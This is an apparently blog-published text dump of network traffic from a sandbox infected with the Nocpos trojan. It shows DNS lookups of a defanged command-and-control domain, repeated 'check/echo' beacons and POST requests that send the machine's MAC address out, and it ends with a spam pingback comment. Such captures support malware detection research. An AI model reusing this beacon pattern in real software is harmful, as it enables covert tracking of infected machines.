Nocpos Trojan Malware PCAP Converted Traffic Sample Low Detection Rate

By | June 20, 2015

1970-01-01 -3:-59:-35.837643 IP 10.0.2.15.1025 > 10.0.2.2.53: 24554+ A? support.wordpress-dark[.]com. (44)
E..H.b….”3

……5.4.._…………support.wordpress-dark[.]com…..
1970-01-01 -3:-59:-35.856699 IP 10.0.2.2.53 > 10.0.2.15.1025: 24554 2/2/0 A 104.28.4.94, A 104.28.5.94 (127)
E…….@.b$

….5….`._…………support.wordpress-dark[.]com…………..,..h..^………,..h..^………….cody.ns
cloudflare.#………….sue.]
1970-01-01 -3:-59:-35.858658 IP 10.0.2.15.1048 > 104.28.4.94.80: Flags [S], seq 2059076059, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0.c@…..
…h..^…Pz…….p……………
1970-01-01 -3:-59:-35.862945 IP 104.28.4.94.80 > 10.0.2.15.1048: Flags [S.], seq 64001, ack 2059076060, win 65535, options [mss 1460], length 0
E..,….@..%h..^
….P……z…`………..
1970-01-01 -3:-59:-35.863655 IP 10.0.2.15.1048 > 104.28.4.94.80: Flags [.], ack 1, win 64240, length 0
E..(.d@…..
…h..^…Pz…….P….X…. FEE
1970-01-01 -3:-59:-35.865224 IP 10.0.2.15.1048 > 104.28.4.94.80: Flags [P.], seq 1:63, ack 1, win 64240, length 62
E..f.e@…..
…h..^…Pz…….P….V..GET /check/echo HTTP/1.1
Host: support.wordpress-dark[.]com
1970-01-01 -3:-59:-35.865284 IP 104.28.4.94.80 > 10.0.2.15.1048: Flags [.], ack 63, win 65535, length 0
E..(. ..@..(h..^
….P……z…P…….
1970-01-01 -3:-59:-35.902853 IP 104.28.4.94.80 > 10.0.2.15.1048: Flags [P.], seq 1:409, ack 63, win 65535, length 408
E….!..@…h..^
….P……z…P….B..HTTP/1.1 200 OK
Date: Wed, 17 Dec 2014 03:49:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dbfbc3842507971794fa2b7ca3316563e1418788175; expires=Thu, 17-Dec-15 03:49:35 GMT; path=/; domain=.wordpress-dark[.]com; HttpOnly
X-Powered-By: PHP/5.4.4-14+deb7u9
Vary: Accept-Encoding
Server: cloudflare-nginx
CF-RAY: 19a026d171c61383-LHR

2
up
0
1970-01-01 -3:-59:-35.911535 IP 10.0.2.15.1048 > 104.28.4.94.80: Flags [P.], seq 63:335, ack 409, win 63832, length 272
E..8.f@…..
…h..^…Pz…….P..Xzu..POST /check HTTP/1.1
User-Agent: something
Content-Type: application/x-www-form-urlencoded
Host: support.wordpress-dark[.]com
Content-Length: 35
Cache-Control: no-cache
Cookie: __cfduid=dbfbc3842507971794fa2b7ca3316563e1418788175

address=08-00-27-68-68-B9&dt1=&dt2=
1970-01-01 -3:-59:-35.911599 IP 104.28.4.94.80 > 10.0.2.15.1048: Flags [.], ack 335, win 65535, length 0
E..(.”..@..&h..^
….P……z..*P….c..
1970-01-01 -3:-59:-34.081818 IP 104.28.4.94.80 > 10.0.2.15.1048: Flags [P.], seq 409:661, ack 335, win 65535, length 252
E..$.#..@..)h..^
….P……z..*P….f..HTTP/1.1 200 OK
Date: Wed, 17 Dec 2014 03:49:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u9
Vary: Accept-Encoding
Server: cloudflare-nginx
CF-RAY: 19a026d1b1d01383-LHR
1970-01-01 -3:-58:-57.088094 IP 10.0.2.15.1048 > 104.28.4.94.80: Flags [P.], seq 335:459, ack 661, win 63580, length 124
E….x@….S
…h..^…Pz..*….P..\7…GET /check/echo HTTP/1.1
Host: support.wordpress-dark[.]com
Cookie: __cfduid=dbfbc3842507971794fa2b7ca3316563e1418788175
1970-01-01 -3:-58:-57.088166 IP 104.28.4.94.80 > 10.0.2.15.1048: Flags [.], ack 459, win 65535, length 0
E..(.4..@…h..^
….P……z…P…….
1970-01-01 -3:-58:-57.129052 IP 104.28.4.94.80 > 10.0.2.15.1048: Flags [P.], seq 661:920, ack 459, win 65535, length 259
E..+.5..@…h..^
….P……z…P…….HTTP/1.1 200 OK
Date: Wed, 17 Dec 2014 03:50:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u9
Vary: Accept-Encoding
Server: cloudflare-nginx
CF-RAY: 19a027ba1fe41383-LHR

2
up
0
1970-01-01 -3:-58:-57.132135 IP 10.0.2.15.1048 > 104.28.4.94.80: Flags [P.], seq 459:731, ack 920, win 63321, length 272
E..8.y@…..
…h..^…Pz…….P..Yx…POST /check HTTP/1.1
User-Agent: something
Content-Type: application/x-www-form-urlencoded
Host: support.wordpress-dark[.]com
Content-Length: 35
Cache-Control: no-cache
Cookie: __cfduid=dbfbc3842507971794fa2b7ca3316563e1418788175

address=08-00-27-68-68-B9&dt1=&dt2=
1970-01-01 -3:-58:-57.132195 IP 104.28.4.94.80 > 10.0.2.15.1048: Flags [.], ack 731, win 65535, length 0
E..(.6..@…h..^
….P……z…P…….
1970-01-01 -3:-58:-57.187810 IP 104.28.4.94.80 > 10.0.2.15.1048: Flags [P.], seq 920:1172, ack 731, win 65535, length 252
E..$.7..@…h..^
….P……z…P…….HTTP/1.1 200 OK
Date: Wed, 17 Dec 2014 03:50:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u9
Vary: Accept-Encoding
Server: cloudflare-nginx
CF-RAY: 19a027ba5fe81383-LHR

Share Button

One thought on “Nocpos Trojan Malware PCAP Converted Traffic Sample Low Detection Rate

  1. Pingback: click here link click click this link good site here is the site http://www.clemsondeckbuilders.com/ www.clemsondeckbuilders.com/ clemsondeckbuilders.com/ http://www.clemsondeckbuilders.com/ www.clemsondeckbuilders.com/ clemsondeckbuilders.com/ http://www

Leave a Reply

Your email address will not be published. Required fields are marked *